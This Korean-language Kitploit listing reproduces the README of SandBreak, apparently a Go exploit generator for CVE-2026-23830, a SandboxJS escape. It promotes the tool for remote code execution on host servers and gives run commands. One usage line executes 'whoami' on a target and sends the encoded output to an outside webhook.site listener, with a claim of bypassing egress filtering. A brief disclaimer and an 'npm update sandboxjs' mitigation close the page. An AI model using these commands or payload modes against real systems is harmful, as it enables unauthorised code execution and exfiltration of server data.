Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-23830-SandBreak — CVE-2026-23830(SandboxJS 이스케이프)에 대한 익스플로잇 페이로드를 생성 및 전달하며, 블라인드 OOB 외부 유출 및 로컬 calc PoC 모드를 지원합니다. HTTP/HTTPS 리스너를 지원하며 축소된 JavaScript 페이로드를 생성합니다. | Kitploit
도구/GitHubGitHub/galaxy-sc/cve-2026-23830-sandbreak
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubgalaxy-sc/cve-2026-23830-sandbreak

CVE-2026-23830-SandBreak

CVE-2026-23830(SandboxJS 이스케이프)에 대한 익스플로잇 페이로드를 생성 및 전달하며, 블라인드 OOB 외부 유출 및 로컬 calc PoC 모드를 지원합니다. HTTP/HTTPS 리스너를 지원하며 축소된 JavaScript 페이로드를 생성합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
16개월 전아직 검토되지 않음

SandBreak

CVE-2026-23830 익스플로잇 생성기 및 자동 Pwn 도구

Go Version License Type

SandBreak는 **SandboxJS 탈출 취약점(CVE-2026-23830)**을 활용하도록 설계된 강력한 Go 기반 익스플로잇 생성기입니다.

이 도구는 이전 버전의 sandboxjs에서 보호되지 않는 AsyncFunction 생성자를 악용하여 공격자가 V8 샌드박스 환경을 벗어나 호스트 시스템에서 임의 코드를 실행할 수 있게 합니다. Blind OOB Exfiltration, Defacement, Error-Based RCE를 포함한 여러 페이로드 모드를 지원합니다.


기능

  • 2가지 공격 모드:
    • oob: 블라인드 시나리오를 위한 대역외 데이터 유출(HTTP/HTTPS).
    • calc: calc.exe 실행(클래식 PoC).
  • 스마트 OOB: 서버 충돌을 방지하기 위해 HTTP와 HTTPS를 자동으로 감지합니다.
  • Go 기반: 단일 바이너리로, 공격자 머신에 추가 의존성이 필요 없습니다.
  • 경량화: 순수하고 축소된 JavaScript 페이로드를 생성합니다.

설치

리포지토리를 클론하고 실행하세요:

root@kitploit:~
git clone https://github.com/Galaxy-sc/CVE-2026-23830-SandBreak.git
cd CVE-2026-23830-SandBreak
go run CVE-2026-23830.go

사용법

root@kitploit:~
go run CVE-2026-23830.go -mode [MODE] -cmd [COMMAND] [OPTIONS]

1. OOB 모드 (Blind RCE - 전문가용)

출력 피드백이 없을 때 사용합니다. 명령을 실행하고 Base64로 인코딩된 결과를 리스너(예: webhook.site)로 전송합니다.

root@kitploit:~
go run CVE-2026-23830.go -mode oob -cmd "whoami" -url "https://webhook.site/YOUR-UUID"

네트워크 오류를 처리하여 기본적인 이그레스 필터링 충돌을 성공적으로 우회합니다.

2. Calc 모드 (로컬 테스트)

Windows 서버에서 계산기를 실행합니다.

root@kitploit:~
go run CVE-2026-23830.go -mode calc

개념 증명 (PoC)

시나리오: OOB 유출

사이트에 시각적 출력이 없음에도 불구하고 공격자가 Webhook을 통해 서버의 사용자 데이터를 수신하는 모습.


면책 조항

이 도구는 교육 목적 및 승인된 침투 테스트를 위해서만 제작되었습니다.

  • 소유하지 않았거나 명시적 테스트 권한이 없는 시스템에는 이 도구를 사용하지 마십시오.
  • 작성자는 이 도구로 인한 오용이나 손해에 대해 책임을 지지 않습니다.

완화 조치

AsyncFunction 생성자가 제대로 샌드박싱된 최신 버전으로 sandboxjs를 업그레이드하세요.

root@kitploit:~
npm update sandboxjs

작성자: Meysam Bal-afkan

라이선스: MIT

도구 다운로드